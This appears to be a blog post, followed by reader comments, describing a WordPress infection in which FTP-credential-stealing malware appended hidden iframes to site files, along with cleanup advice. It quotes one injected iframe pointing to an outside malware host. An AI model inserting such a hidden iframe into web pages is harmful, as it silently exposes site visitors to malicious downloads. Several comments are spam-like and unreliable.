Completely Remove Malware from Your Computer – Malware / Worm that steals FTP login information
This week I got error on almost of my Wordpress blogs, this error occurred twice in the past 5 days. It really made me worried and giddy, because there’s just a blank page with error message like this:
Warning: Unexpected character in input: ''' (ASCII=39) state=1 in ….
Parse error: syntax error, unexpected '.' in ….
After I checked my files, there’s code added at the bottom line of my files, iframe code like this:
<iframe src="http://c9u.at:8080/ts/in.cgi?pepsi147" width=125 height=125 style="visibility: hidden"></iframe>
This line tells me that I have been hacked, infected by virus / worm.
This is a malware / worm that steals my FTP login information from my FTP programs and modifies lots of php / html / htm pages on all of the sites it can access. In FTP log file, there’re lots of entries showing someone downloading the file and then re-uploading it again. It appears destructively to modify the files overwriting whatever text was there.
Here’s a list of some sources that I found according to this issue:
http://wordpress.org/support/topic/268083
http://wordpress.org/support/topic/272140
http://wordpress.org/support/topic/272379
http://ocaoimh.ie/did-your-wordpress-site-get-hacked/
First time I face this virus, what I did is re-upload those infected files and rename my FTP password. I think I just resolved this problem and it will not happen again. But I was wrong, today I get this error again.
So I really know now, I need to take serious action to completely remove the worm / malware. I have to ensure my computer completely clean and it doesn’t happen again.
Referring to the Hostgator Security Support, in order to protect against future attack, I need to run full virus and malware scans on my computer to ensure that they are clean.
Hello,
It appears that malicious code has been uploaded to your account via FTP using a compromised username and password. At this time, I have removed the malicious code from the account.
From our experience with malware of this nature, the user account passwords are compromised though viruses/malware located on your local computer. This malware sniffs out passwords used and stored by FTP programs located on the computer. In order to protect against future attack, you will need to run full virus and malware scans on your computers to ensure that they are clean. I recommend using multiple scanners as we have found that some scanners do not detect the malware. MalwareBytes ( http://www.malwarebytes.org/ ) and ComboFix ( http://www.bleepingcomputer.com/combofix/how-to-use-combofix ) have been reported to be able to clean this malware. It is highly suggested that you also do the following:
* Any computers legitimately allowed to access the account must be updated fully (Windows updates, browser updates, application updates, anti-virus updates)
* Any computers legitimately allowed to access the account must be completely scanned for viruses and secured completely
Despite now I’m not sure that my computer completely clean, but I just have been doing some action to protect my computer:
- Update my FTP password
- Update my FPT software to the newest version
- Of course, re-upload infected files dan upgrade my Wordpress blog to the latest version
- Scan my whole computer using Malware Bytes from www.malwarebytes.org
Only that I can do now, I hope this error doesn’t happen again and the worm is completely removed.
Realted Articles:
that’s why we need to always have an updated anti-malware, anti-spyware.. and antivirus in our PC.
I just changed my loginn info too.. napa-paranoid na yata ako..
Upgrade every now and then. Passwords should also be changed to prevent from all these FTP hacks.
my pc is installed with deepfreeze and AVG. And don’t have problems with malwares.
Based, demand service, it does not need to be installed on every computer. Remove Http Referrer
Malware or malicious software is software designed to infiltrate or damage a computer system without the owner’s informed consent. Cloak Link
After losing a computer to damage caused by viruses and malware, I can’t stop worrying about the security of my other PCs. I recently set up a brand new machine and I would really appreciate some advice on what firewall to install and what antivirus to use.
How did you removed this Malware? If i am using AVG9 is it possible to remove malware like this?
In market their are enormous number of antivirus treatment solution.
Thanks for the code man… I think many blog owners looking for this kinda codes.
There are many Anti-malware and Anti-spyware in the market but they does not remove it properly. I think this Code will help a lot thank you for sharing this Post.
Thanks for information.This information very important
I recently set up a brand new machine and I would really appreciate some advice on what firewall to install and what anti virus to use.But sometime the operating system also enhance the matter of the fact as it is considered.
I purchased a domain name and a hosting plan from godaddy.com. I am using a WYSIWYG program called NVU to build my site. It asks for the Publishing Address, which is the FTP server info that I get from my web hosting service.
I once suffered this kind of hack. It allowed the hacker to post url’s right inside my post. I didn’t notice it on time. When I eventually discovered it, it took a lot of work to get the posts re-written and the malicious urls removed. I’m going to run a malware test on my computer right away.
Naija Computers´s last blog ..Which Is The Best AntiVirus?
It can be really nauseating getting hacked. It is better to take necessary steps to prevent a hack especially as your website content get’s voluminous. Else, the clean-up process can really be tasking.
Small Business´s last blog ..Online Business